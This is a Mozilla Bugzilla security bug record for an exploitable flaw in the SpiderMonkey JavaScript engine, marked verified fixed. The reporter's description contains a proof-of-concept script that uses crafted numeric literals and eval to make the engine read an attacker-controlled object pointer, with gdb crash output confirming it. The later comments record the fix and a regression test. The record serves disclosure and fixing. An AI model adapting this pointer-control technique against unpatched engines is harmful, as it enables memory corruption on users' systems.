Last Comment Bug 364023 - LITOPX DEFFUN is exploitable
: LITOPX DEFFUN is exploitable
Status: VERIFIED FIXED
[sg:critical] security tracker for bu...
: crash, verified1.8.0.10, verified1.8.1.2
Product: Core
Classification: Components
Component: JavaScript Engine (show other bugs)
: Trunk
: All All
: -- critical (vote)
: ---
Assigned To: shutdown
:
Mentors:
Depends on:
Blocks:
  Show dependency treegraph
 
Reported: 2006-12-15 21:00 PST by shutdown
Modified: 2007-08-08 03:30 PDT (History)
4 users (show)
dveditz: blocking1.8.1.2+
dveditz: blocking1.8.0.10+
bob: in‑testsuite+
See Also:
Crash Signature:
(edit)
QA Whiteboard:
Iteration: ---
Points: ---
Has Regression Range: ---
Has STR: ---


Attachments
js1_5/Function/regress-364023.js (2.55 KB, text/plain)
2007-01-17 03:27 PST, Bob Clary [:bc:]
no flags Details

Description shutdown 2006-12-15 21:00:11 PST
$ cat litopx-deffun-x.txt
function exploit() {
  var code = "";
  for(var i = 0; i < 0x10000; i++) {
    if(i == 125) {
      code += "void 0x10000050505050;\n";
    } else {
      code += "void " + (0x10000000000000 + i) + ";\n";
    }
  }
  code += "function foo() {}\n";
  eval(code);
}
exploit();

$ gdb --eval run --args dbg.obj/js litopx-deffun-x.txt
...
Program received signal SIGSEGV, Segmentation fault.
0x00432d3d in JS_GetPrivate (cx=0xb50750, obj=0x131c620) at jsapi.c:2298
2298        JS_ASSERT(OBJ_GET_CLASS(cx, obj)->flags & JSCLASS_HAS_PRIVATE);
(gdb) print *obj
$1 = {map = 0x50505050, fslots = {1127219200, 126, 1127219200, 127,
    1127219200, 128}, dslots = 0x43300000}

In other words, bug 363988 is exploitable.
Comment 1 Daniel Veditz [:dveditz] 2006-12-16 09:28:46 PST
shutdown contributed a patch for bug 363988
Comment 2 Brendan Eich [:brendan] 2006-12-16 12:03:01 PST
Fix landed for bug 363988.

/be
Comment 3 Bob Clary [:bc:] 2007-01-17 03:27:05 PST
Created attachment 251755 [details]
js1_5/Function/regress-364023.js
Comment 4 Bob Clary [:bc:] 2007-01-29 09:48:03 PST
verified fixed 1.8.0, 1.8.1, 1.9.0 2007-01-23 win/mac*/linux
Comment 5 Bob Clary [:bc:] 2007-08-08 03:30:28 PDT
/cvsroot/mozilla/js/tests/js1_5/Function/regress-364023.js,v  <--  regress-364023.js
initial revision: 1.1

Note You need to log in before you can comment on or make changes to this bug.